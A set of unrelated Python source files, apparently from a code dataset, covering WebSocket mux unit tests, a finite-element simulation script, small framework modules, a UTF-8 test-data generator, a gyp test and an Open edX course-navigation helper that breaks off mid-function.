parser = mux._MuxFramePayloadParser(inner_frame_data)
channel_id = parser.read_channel_id()
if channel_id == mux._CONTROL_CHANNEL_ID:
self._control_blocks.append(parser.remaining_data())
return
if not channel_id in self._channel_data:
self._channel_data[channel_id] = _OutgoingChannelData()
channel_data = self._channel_data[channel_id]
(inner_fin, inner_rsv1, inner_rsv2, inner_rsv3, inner_opcode,
inner_payload) = parser.read_inner_frame()
channel_data.pending_fragments.append(inner_payload)
if channel_data.current_opcode is None:
if inner_opcode == common.OPCODE_CONTINUATION:
raise Exception('Sending invalid continuation opcode')
channel_data.current_opcode = inner_opcode
else:
if inner_opcode != common.OPCODE_CONTINUATION:
raise Exception('Sending invalid opcode %d' % inner_opcode)
if not inner_fin:
return
message = ''.join(channel_data.pending_fragments)
channel_data.pending_fragments = []
if (channel_data.current_opcode == common.OPCODE_TEXT or
channel_data.current_opcode == common.OPCODE_BINARY):
channel_data.messages.append(message)
else:
channel_data.control_messages.append(
{'opcode': channel_data.current_opcode,
'message': message})
channel_data.current_opcode = None
def get_written_control_blocks(self):
return self._control_blocks
def get_written_messages(self, channel_id):
return self._channel_data[channel_id].messages
def get_written_control_messages(self, channel_id):
return self._channel_data[channel_id].control_messages
class _ChannelEvent(object):
"""A structure that records channel events."""
def __init__(self):
self.messages = []
self.exception = None
self.client_initiated_closing = False
class _MuxMockDispatcher(object):
"""Mock class of dispatch.Dispatcher for mux."""
def __init__(self):
self.channel_events = {}
def do_extra_handshake(self, request):
pass
def _do_echo(self, request, channel_events):
while True:
message = request.ws_stream.receive_message()
if message == None:
channel_events.client_initiated_closing = True
return
if message == 'Goodbye':
return
channel_events.messages.append(message)
# echo back
request.ws_stream.send_message(message)
def _do_ping(self, request, channel_events):
request.ws_stream.send_ping('Ping!')
def transfer_data(self, request):
self.channel_events[request.channel_id] = _ChannelEvent()
try:
# Note: more handler will be added.
if request.uri.endswith('echo'):
self._do_echo(request,
self.channel_events[request.channel_id])
elif request.uri.endswith('ping'):
self._do_ping(request,
self.channel_events[request.channel_id])
else:
raise ValueError('Cannot handle path %r' % request.path)
if not request.server_terminated:
request.ws_stream.close_connection()
except ConnectionTerminatedException, e:
self.channel_events[request.channel_id].exception = e
except Exception, e:
self.channel_events[request.channel_id].exception = e
raise
def _create_mock_request():
headers = {'Host': 'server.example.com',
'Upgrade': 'websocket',
'Connection': 'Upgrade',
'Sec-WebSocket-Key': 'dGhlIHNhbXBsZSBub25jZQ==',
'Sec-WebSocket-Version': '13',
'Origin': 'http://example.com'}
request = mock.MockRequest(uri='/echo',
headers_in=headers,
connection=_MockMuxConnection())
request.ws_stream = Stream(request, options=StreamOptions())
request.mux = True
request.mux_extensions = []
request.mux_quota = 8 * 1024
return request
def _create_add_channel_request_frame(channel_id, encoding, encoded_handshake):
if encoding != 0 and encoding != 1:
raise ValueError('Invalid encoding')
block = mux._create_control_block_length_value(
channel_id, mux._MUX_OPCODE_ADD_CHANNEL_REQUEST, encoding,
encoded_handshake)
payload = mux._encode_channel_id(mux._CONTROL_CHANNEL_ID) + block
return create_binary_frame(payload, mask=True)
def _create_logical_frame(channel_id, message, opcode=common.OPCODE_BINARY,
mask=True):
bits = chr(0x80 | opcode)
payload = mux._encode_channel_id(channel_id) + bits + message
return create_binary_frame(payload, mask=mask)
def _create_request_header(path='/echo'):
return (
'GET %s HTTP/1.1\r\n'
'Host: server.example.com\r\n'
'Upgrade: websocket\r\n'
'Connection: Upgrade\r\n'
'Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n'
'Sec-WebSocket-Version: 13\r\n'
'Origin: http://example.com\r\n'
'\r\n') % path
class MuxTest(unittest.TestCase):
"""A unittest for mux module."""
def test_channel_id_decode(self):
data = '\x00\x01\xbf\xff\xdf\xff\xff\xff\xff\xff\xff'
parser = mux._MuxFramePayloadParser(data)
channel_id = parser.read_channel_id()
self.assertEqual(0, channel_id)
channel_id = parser.read_channel_id()
self.assertEqual(1, channel_id)
channel_id = parser.read_channel_id()
self.assertEqual(2 ** 14 - 1, channel_id)
channel_id = parser.read_channel_id()
self.assertEqual(2 ** 21 - 1, channel_id)
channel_id = parser.read_channel_id()
self.assertEqual(2 ** 29 - 1, channel_id)
self.assertEqual(len(data), parser._read_position)
def test_channel_id_encode(self):
encoded = mux._encode_channel_id(0)
self.assertEqual('\x00', encoded)
encoded = mux._encode_channel_id(2 ** 14 - 1)
self.assertEqual('\xbf\xff', encoded)
encoded = mux._encode_channel_id(2 ** 14)
self.assertEqual('\xc0@\x00', encoded)
encoded = mux._encode_channel_id(2 ** 21 - 1)
self.assertEqual('\xdf\xff\xff', encoded)
encoded = mux._encode_channel_id(2 ** 21)
self.assertEqual('\xe0 \x00\x00', encoded)
encoded = mux._encode_channel_id(2 ** 29 - 1)
self.assertEqual('\xff\xff\xff\xff', encoded)
# channel_id is too large
self.assertRaises(ValueError,
mux._encode_channel_id,
2 ** 29)
def test_create_control_block_length_value(self):
data = 'Hello, world!'
block = mux._create_control_block_length_value(
channel_id=1, opcode=mux._MUX_OPCODE_ADD_CHANNEL_REQUEST,
flags=0x7, value=data)
expected = '\x1c\x01\x0dHello, world!'
self.assertEqual(expected, block)
data = 'a' * (2 ** 8)
block = mux._create_control_block_length_value(
channel_id=2, opcode=mux._MUX_OPCODE_ADD_CHANNEL_RESPONSE,
flags=0x0, value=data)
expected = '\x21\x02\x01\x00' + data
self.assertEqual(expected, block)
data = 'b' * (2 ** 16)
block = mux._create_control_block_length_value(
channel_id=3, opcode=mux._MUX_OPCODE_DROP_CHANNEL,
flags=0x0, value=data)
expected = '\x62\x03\x01\x00\x00' + data
self.assertEqual(expected, block)
def test_read_control_blocks(self):
data = ('\x00\x01\00'
'\x61\x02\x01\x00%s'
'\x0a\x03\x01\x00\x00%s'
'\x63\x04\x01\x00\x00\x00%s') % (
'a' * 0x0100, 'b' * 0x010000, 'c' * 0x01000000)
parser = mux._MuxFramePayloadParser(data)
blocks = list(parser.read_control_blocks())
self.assertEqual(4, len(blocks))
self.assertEqual(mux._MUX_OPCODE_ADD_CHANNEL_REQUEST, blocks[0].opcode)
self.assertEqual(0, blocks[0].encoding)
self.assertEqual(0, len(blocks[0].encoded_handshake))
self.assertEqual(mux._MUX_OPCODE_DROP_CHANNEL, blocks[1].opcode)
self.assertEqual(0, blocks[1].mux_error)
self.assertEqual(0x0100, len(blocks[1].reason))
self.assertEqual(mux._MUX_OPCODE_ADD_CHANNEL_REQUEST, blocks[2].opcode)
self.assertEqual(2, blocks[2].encoding)
self.assertEqual(0x010000, len(blocks[2].encoded_handshake))
self.assertEqual(mux._MUX_OPCODE_DROP_CHANNEL, blocks[3].opcode)
self.assertEqual(0, blocks[3].mux_error)
self.assertEqual(0x01000000, len(blocks[3].reason))
self.assertEqual(len(data), parser._read_position)
def test_create_add_channel_response(self):
data = mux._create_add_channel_response(channel_id=1,
encoded_handshake='FooBar',
encoding=0,
rejected=False)
self.assertEqual('\x82\x0a\x00\x20\x01\x06FooBar', data)
data = mux._create_add_channel_response(channel_id=2,
encoded_handshake='Hello',
encoding=1,
rejected=True)
self.assertEqual('\x82\x09\x00\x34\x02\x05Hello', data)
def test_drop_channel(self):
data = mux._create_drop_channel(channel_id=1,
reason='',
mux_error=False)
self.assertEqual('\x82\x04\x00\x60\x01\x00', data)
data = mux._create_drop_channel(channel_id=1,
reason='error',
mux_error=True)
self.assertEqual('\x82\x09\x00\x70\x01\x05error', data)
# reason must be empty if mux_error is False.
self.assertRaises(ValueError,
mux._create_drop_channel,
1, 'FooBar', False)
def test_parse_request_text(self):
request_text = _create_request_header()
command, path, version, headers = mux._parse_request_text(request_text)
self.assertEqual('GET', command)
self.assertEqual('/echo', path)
self.assertEqual('HTTP/1.1', version)
self.assertEqual(6, len(headers))
self.assertEqual('server.example.com', headers['Host'])
self.assertEqual('websocket', headers['Upgrade'])
self.assertEqual('Upgrade', headers['Connection'])
self.assertEqual('dGhlIHNhbXBsZSBub25jZQ==',
headers['Sec-WebSocket-Key'])
self.assertEqual('13', headers['Sec-WebSocket-Version'])
self.assertEqual('http://example.com', headers['Origin'])
class MuxHandlerTest(unittest.TestCase):
def test_add_channel(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS,
mux._INITIAL_QUOTA_FOR_CLIENT)
encoded_handshake = _create_request_header(path='/echo')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
flow_control = mux._create_flow_control(channel_id=2,
replenished_quota=5,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
encoded_handshake = _create_request_header(path='/echo')
add_channel_request = _create_add_channel_request_frame(
channel_id=3, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
flow_control = mux._create_flow_control(channel_id=3,
replenished_quota=5,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
request.connection.put_bytes(
_create_logical_frame(channel_id=2, message='Hello'))
request.connection.put_bytes(
_create_logical_frame(channel_id=3, message='World'))
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
request.connection.put_bytes(
_create_logical_frame(channel_id=2, message='Goodbye'))
request.connection.put_bytes(
_create_logical_frame(channel_id=3, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
self.assertEqual([], dispatcher.channel_events[1].messages)
self.assertEqual(['Hello'], dispatcher.channel_events[2].messages)
self.assertEqual(['World'], dispatcher.channel_events[3].messages)
# Channel 2
messages = request.connection.get_written_messages(2)
self.assertEqual(1, len(messages))
self.assertEqual('Hello', messages[0])
# Channel 3
messages = request.connection.get_written_messages(3)
self.assertEqual(1, len(messages))
self.assertEqual('World', messages[0])
control_blocks = request.connection.get_written_control_blocks()
# There should be 8 control blocks:
# - 1 NewChannelSlot
# - 2 AddChannelResponses for channel id 2 and 3
# - 6 FlowControls for channel id 1 (initialize), 'Hello', 'World',
# and 3 'Goodbye's
self.assertEqual(9, len(control_blocks))
def test_add_channel_incomplete_handshake(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS,
mux._INITIAL_QUOTA_FOR_CLIENT)
incomplete_encoded_handshake = 'GET /echo HTTP/1.1'
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=incomplete_encoded_handshake)
request.connection.put_bytes(add_channel_request)
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
self.assertTrue(1 in dispatcher.channel_events)
self.assertTrue(not 2 in dispatcher.channel_events)
def test_add_channel_invalid_version_handshake(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS,
mux._INITIAL_QUOTA_FOR_CLIENT)
encoded_handshake = (
'GET /echo HTTP/1.1\r\n'
'Host: example.com\r\n'
'Connection: Upgrade\r\n'
'Sec-WebSocket-Key2: 12998 5 Y3 1 .P00\r\n'
'Sec-WebSocket-Protocol: sample\r\n'
'Upgrade: WebSocket\r\n'
'Sec-WebSocket-Key1: 4 @1 46546xW%0l 1 5\r\n'
'Origin: http://example.com\r\n'
'\r\n'
'^n:ds[4U')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
self.assertTrue(1 in dispatcher.channel_events)
self.assertTrue(not 2 in dispatcher.channel_events)
def test_receive_drop_channel(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS,
mux._INITIAL_QUOTA_FOR_CLIENT)
encoded_handshake = _create_request_header(path='/echo')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
drop_channel = mux._create_drop_channel(channel_id=2,
outer_frame_mask=True)
request.connection.put_bytes(drop_channel)
# Terminate implicitly opened channel.
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
exception = dispatcher.channel_events[2].exception
self.assertTrue(exception.__class__ == ConnectionTerminatedException)
def test_receive_ping_frame(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS,
mux._INITIAL_QUOTA_FOR_CLIENT)
encoded_handshake = _create_request_header(path='/echo')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
flow_control = mux._create_flow_control(channel_id=2,
replenished_quota=12,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
ping_frame = _create_logical_frame(channel_id=2,
message='Hello World!',
opcode=common.OPCODE_PING)
request.connection.put_bytes(ping_frame)
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
request.connection.put_bytes(
_create_logical_frame(channel_id=2, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
messages = request.connection.get_written_control_messages(2)
self.assertEqual(common.OPCODE_PONG, messages[0]['opcode'])
self.assertEqual('Hello World!', messages[0]['message'])
def test_send_ping(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS,
mux._INITIAL_QUOTA_FOR_CLIENT)
encoded_handshake = _create_request_header(path='/ping')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
flow_control = mux._create_flow_control(channel_id=2,
replenished_quota=5,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
messages = request.connection.get_written_control_messages(2)
self.assertEqual(common.OPCODE_PING, messages[0]['opcode'])
self.assertEqual('Ping!', messages[0]['message'])
def test_two_flow_control(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS,
mux._INITIAL_QUOTA_FOR_CLIENT)
encoded_handshake = _create_request_header(path='/echo')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
# Replenish 5 bytes.
flow_control = mux._create_flow_control(channel_id=2,
replenished_quota=5,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
# Send 10 bytes. The server will try echo back 10 bytes.
request.connection.put_bytes(
_create_logical_frame(channel_id=2, message='HelloWorld'))
# Replenish 5 bytes again.
flow_control = mux._create_flow_control(channel_id=2,
replenished_quota=5,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
request.connection.put_bytes(
_create_logical_frame(channel_id=2, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
messages = request.connection.get_written_messages(2)
self.assertEqual(['HelloWorld'], messages)
def test_no_send_quota_on_server(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS,
mux._INITIAL_QUOTA_FOR_CLIENT)
encoded_handshake = _create_request_header(path='/echo')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
request.connection.put_bytes(
_create_logical_frame(channel_id=2, message='HelloWorld'))
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
mux_handler.wait_until_done(timeout=1)
# No message should be sent on channel 2.
self.assertRaises(KeyError,
request.connection.get_written_messages,
2)
def test_quota_violation_by_client(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS, 0)
encoded_handshake = _create_request_header(path='/echo')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
request.connection.put_bytes(
_create_logical_frame(channel_id=2, message='HelloWorld'))
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
control_blocks = request.connection.get_written_control_blocks()
# The first block is FlowControl for channel id 1.
# The next two blocks are NewChannelSlot and AddChannelResponse.
# The 4th block or the last block should be DropChannels for channel 2.
# (The order can be mixed up)
# The remaining block should be FlowControl for 'Goodbye'.
self.assertEqual(5, len(control_blocks))
expected_opcode_and_flag = ((mux._MUX_OPCODE_DROP_CHANNEL << 5) |
(1 << 4))
self.assertTrue((expected_opcode_and_flag ==
(ord(control_blocks[3][0]) & 0xf0)) or
(expected_opcode_and_flag ==
(ord(control_blocks[4][0]) & 0xf0)))
def test_fragmented_control_message(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(mux._INITIAL_NUMBER_OF_CHANNEL_SLOTS,
mux._INITIAL_QUOTA_FOR_CLIENT)
encoded_handshake = _create_request_header(path='/ping')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
# Replenish total 5 bytes in 3 FlowControls.
flow_control = mux._create_flow_control(channel_id=2,
replenished_quota=1,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
flow_control = mux._create_flow_control(channel_id=2,
replenished_quota=2,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
flow_control = mux._create_flow_control(channel_id=2,
replenished_quota=2,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
messages = request.connection.get_written_control_messages(2)
self.assertEqual(common.OPCODE_PING, messages[0]['opcode'])
self.assertEqual('Ping!', messages[0]['message'])
def test_channel_slot_violation_by_client(self):
request = _create_mock_request()
dispatcher = _MuxMockDispatcher()
mux_handler = mux._MuxHandler(request, dispatcher)
mux_handler.start()
mux_handler.add_channel_slots(slots=1,
send_quota=mux._INITIAL_QUOTA_FOR_CLIENT)
encoded_handshake = _create_request_header(path='/echo')
add_channel_request = _create_add_channel_request_frame(
channel_id=2, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
flow_control = mux._create_flow_control(channel_id=2,
replenished_quota=10,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
request.connection.put_bytes(
_create_logical_frame(channel_id=2, message='Hello'))
# This request should be rejected.
encoded_handshake = _create_request_header(path='/echo')
add_channel_request = _create_add_channel_request_frame(
channel_id=3, encoding=0,
encoded_handshake=encoded_handshake)
request.connection.put_bytes(add_channel_request)
flow_control = mux._create_flow_control(channel_id=3,
replenished_quota=5,
outer_frame_mask=True)
request.connection.put_bytes(flow_control)
request.connection.put_bytes(
_create_logical_frame(channel_id=3, message='Hello'))
request.connection.put_bytes(
_create_logical_frame(channel_id=1, message='Goodbye'))
request.connection.put_bytes(
_create_logical_frame(channel_id=2, message='Goodbye'))
mux_handler.wait_until_done(timeout=2)
self.assertEqual(['Hello'], dispatcher.channel_events[2].messages)
self.assertFalse(dispatcher.channel_events.has_key(3))
if __name__ == '__main__':
unittest.main()
# vi:sts=4 sw=4 et
|
cosailer/caeproject
|
refs/heads/master
|
simulation_result/1/project3_harmonic_sub.py
|
4
|
# -*- coding: utf-8 -*-
"""
-------------------------------------
N A C S P Y T H O N S C R I P T
-------------------------------------
NACS version: 2.0.2745 - pre3
NACS architecture: CENTOS 5.11 (X86_64)
File generated at Tue Jan 20 16:55:05 2015
On host 'lse86' by 'cae42'
"""
from __future__ import division
try:
from nacs.scripting import *
except:
raise Exception("File is only executable in the NACS python interpreter!")
# =================
# NACS SIMULATION
# =================
simulation = NacsSimulation()
simulation.setGrid(u'project3.nmf', 'plane')
simulation.addOutput(Output.Nacs())
text = Output.Text()
simulation.addOutput(text)
simulation.addOutput(Output.GiD())
# =====================
# MATERIAL DEFINITION
# =====================
copper = Material('Copper')
copper.density(8940.0)
copper.lossTangensDelta([1000],[0.002])
copper.stiffness.isotropic.byENu(1.15e+11, 0.35)
steel = Material('Steel')
steel.density(7850)
steel.lossTangensDelta([1000],[0.0003])
steel.stiffness.isotropic.byENu(1.95e+11, 0.28)
silicon = Material('Silicon')
silicon.density(2300.0)
silicon.stiffness.isotropic.byENu(67500000000.0, 0.1)
simulation.setMat('exc_f_r', copper)
simulation.setMat('rec_f_r', copper)
simulation.setMat('sen_coat_r', steel)
simulation.setMat('silicon_r', silicon)
# ===============
# ANALYSIS STEP
# ===============
harm1 = Analysis.Harmonic()
harm1.set(1, 1373000000.0, 1373000000.0, 'log')
mech1 = Physic.Mechanic('planeStrain')
mech1.addRegions(['exc_f_r', 'sen_coat_r', 'silicon_r', 'rec_f_r'])
mech1.addBc(mech1.BC.Force.expr('exc_f_r', 'y', "-1000"))
mech1.addBc(mech1.BC.Fix('outerbounds_bot', ['x', 'y']))
mech1.addResult(mech1.Result.Displacement(['exc_f_r', 'rec_f_r', 'sen_coat_r', 'silicon_r']))
mech1.addResult(mech1.Result.Displacement(['observer_point_1', 'observer_point_2', 'observer_point_3', 'observer_point_4', 'observer_point_e4'], 'amplPhase', 'mesh', [text]))
harm1.addPhysic(mech1)
simulation.addAnalysis(harm1)
|
kpanic/lymph
|
refs/heads/master
|
iris/events/null.py
|
1
|
from iris.events.base import BaseEventSystem
class NullEventSystem(BaseEventSystem):
def emit(self, container, event):
pass
|
jefftc/changlab
|
refs/heads/master
|
Betsy/Betsy/modules/merge_class0_class1_signal_signal.py
|
1
|
from Module import AbstractModule
class Module(AbstractModule):
def __init__(self):
AbstractModule.__init__(self)
def run(
self, network, antecedents, out_attributes, user_options, num_cores,
outfile):
"""merge three signal file to generate a joined signal file"""
import os
from Betsy import module_utils
merge_node1, merge_node2 = antecedents
assert os.path.exists(merge_node1.identifier), \
'File not found: %s' % merge_node1.identifier
assert os.path.exists(merge_node2.identifier), \
'File not found: %s' % merge_node2.identifier
file1, file2 = module_utils.convert_to_same_platform(
merge_node1.identifier, merge_node2.identifier)
f = file(outfile, 'w')
module_utils.merge_two_files(file1, file2, f)
f.close()
def name_outfile(self, antecedents, user_options):
from Betsy import module_utils
data_node1, data_node2 = antecedents
original_file = module_utils.get_inputid(data_node1.identifier)
filename = 'signal_merge' + original_file + '.tdf'
return filename
|
Stargrazer82301/CAAPR
|
refs/heads/master
|
CAAPR/CAAPR_AstroMagic/PTS/pts/modeling/config/prepare_data.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
# Import the relevant PTS classes and modules
from pts.core.basics.configuration import ConfigurationDefinition
# -----------------------------------------------------------------
# Create the configuration
definition = ConfigurationDefinition()
# Add required arguments
definition.add_required("image", str, "the name of the image for which to run the preparation")
# Add optional arguments
definition.add_optional("reference_image", str, "the name of the reference image")
definition.add_flag("steps", "write the results of intermediate steps")
definition.add_flag("visualise", "make visualisations")
#config.add_section("importation")
#config.add_section("preparation")
# -----------------------------------------------------------------
|
sawirah/OD8
|
refs/heads/master
|
themes/custom/ocelot_d8/node_modules/utf8/tests/generate-test-data.py
|
1788
|
#!/usr/bin/env python
import re
import json
# https://mathiasbynens.be/notes/javascript-encoding#surrogate-formulae
# http://stackoverflow.com/a/13436167/96656
def unisymbol(codePoint):
if codePoint >= 0x0000 and codePoint <= 0xFFFF:
return unichr(codePoint)
elif codePoint >= 0x010000 and codePoint <= 0x10FFFF:
highSurrogate = int((codePoint - 0x10000) / 0x400) + 0xD800
lowSurrogate = int((codePoint - 0x10000) % 0x400) + 0xDC00
return unichr(highSurrogate) + unichr(lowSurrogate)
else:
return 'Error'
def hexify(codePoint):
return 'U+' + hex(codePoint)[2:].upper().zfill(6)
def writeFile(filename, contents):
print filename
with open(filename, 'w') as f:
f.write(contents.strip() + '\n')
data = []
for codePoint in range(0x000000, 0x10FFFF + 1):
# Skip non-scalar values.
if codePoint >= 0xD800 and codePoint <= 0xDFFF:
continue
symbol = unisymbol(codePoint)
# http://stackoverflow.com/a/17199950/96656
bytes = symbol.encode('utf8').decode('latin1')
data.append({
'codePoint': codePoint,
'decoded': symbol,
'encoded': bytes
});
jsonData = json.dumps(data, sort_keys=False, indent=2, separators=(',', ': '))
# Use tabs instead of double spaces for indentation
jsonData = jsonData.replace(' ', '\t')
# Escape hexadecimal digits in escape sequences
jsonData = re.sub(
r'\\u([a-fA-F0-9]{4})',
lambda match: r'\u{}'.format(match.group(1).upper()),
jsonData
)
writeFile('data.json', jsonData)
|
roisagiv/webrtc-ios
|
refs/heads/master
|
tools/gyp/test/variables/commands/gyptest-commands-repeated.py
|
14
|
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Test variable expansion of '<!()' syntax commands where they are evaluated
more then once..
"""
import os
import TestGyp
test = TestGyp.TestGyp(format='gypd')
expect = test.read('commands-repeated.gyp.stdout').replace('\r', '')
# Set $HOME so that gyp doesn't read the user's actual
# ~/.gyp/include.gypi file, which may contain variables
# and other settings that would change the output.
os.environ['HOME'] = test.workpath()
test.run_gyp('commands-repeated.gyp',
'--debug', 'variables', '--debug', 'general',
stdout=expect)
# Verify the commands-repeated.gypd against the checked-in expected contents.
#
# Normally, we should canonicalize line endings in the expected
# contents file setting the Subversion svn:eol-style to native,
# but that would still fail if multiple systems are sharing a single
# workspace on a network-mounted file system. Consequently, we
# massage the Windows line endings ('\r\n') in the output to the
# checked-in UNIX endings ('\n').
contents = test.read('commands-repeated.gypd').replace('\r', '')
expect = test.read('commands-repeated.gypd.golden').replace('\r', '')
if not test.match(contents, expect):
print "Unexpected contents of `commands-repeated.gypd'"
test.diff(expect, contents, 'commands-repeated.gypd ')
test.fail_test()
test.pass_test()
|
a-parhom/edx-platform
|
refs/heads/master
|
common/lib/xmodule/xmodule/modulestore/search.py
|
18
|
''' useful functions for finding content and its position '''
from logging import getLogger
from .exceptions import (ItemNotFoundError, NoPathToItem)
LOGGER = getLogger(__name__)
def path_to_location(modulestore, usage_key, full_path=False):
'''
Try to find a course_id/chapter/section[/position] path to location in
modulestore. The courseware insists that the first level in the course is
chapter, but any kind of module can be a "section".
Args:
modulestore: which store holds the relevant objects
usage_key: :class:`UsageKey` the id of the location to which to generate the path
full_path: :class:`Bool` if True, return the full path to location. Default is False.
Raises
ItemNotFoundError if the location doesn't exist.
NoPathToItem if the location exists, but isn't accessible via
a chapter/section path in the course(s) being searched.
Returns:
a tuple (course_id, chapter, section, position) suitable for the
courseware index view.
If the section is a sequential or vertical, position will be the children index
of this location under that sequence.
'''
def flatten(xs):
'''Convert lisp-style (a, (b, (c, ()))) list into a python list.
Not a general flatten function. '''
p = []
while xs != ():
p.append(xs[0])
xs = xs[1]
return p
def find_path_to_course():
'''Find a path up the location graph to a node with the
specified category.
If no path exists, return None.
If a path exists, return it as a tuple with root location first, and
the target location last.
'''
# Standard DFS
# To keep track of where we came from, the work queue has
# tuples (location, path-so-far). To avoid lots of
# copying, the path-so-far is stored as a lisp-style
# list--nested hd::tl tuples, and flattened at the end.
queue = [(usage_key, ())]
while len(queue) > 0:
(next_usage, path) = queue.pop() # Takes from the end
# get_parent_location raises ItemNotFoundError if location isn't found
parent = modulestore.get_parent_location(next_usage)
# print 'Processing loc={0}, path={1}'.format(next_usage, path)
if next_usage.block_type == "course":
# Found it!
path = (next_usage, path)
return flatten(path)
elif parent is None:
# Orphaned item.
return None
# otherwise, add parent locations at the end
newpath = (next_usage, path)
queue.append((parent, newpath))
with modulestore.bulk_operations(usage_key.course_key):
if not modulestore.has_item(usage_key):
raise ItemNotFoundError(usage_key)
path = find_path_to_course()
if path is None:
raise NoPathToItem(usage_key)
if full_path:
return path
n = len(path)
course_id = path[0].course_key
# pull out the location names
chapter = path[1].block_id if n > 1 else None
section = path[2].block_id if n > 2 else None
vertical = path[3].block_id if n > 3 else None
# Figure out the position
position = None
# This block of code will find the position of a module within a nested tree
# of modules. If a problem is on tab 2 of a sequence that's on tab 3 of a
# sequence, the resulting position is 3_2. However, no positional modules
# (e.g. sequential and videosequence) currently deal with this form of
# representing nested positions. This needs to happen before jumping to a
# module nested in more than one positional module will work.
if n > 3:
position_list = []
for path_index in range(2, n - 1):
category = path[path_index].block_type
if category == 'sequential' or category == 'videosequence':
section_desc = modulestore.get_item(path[path_index])
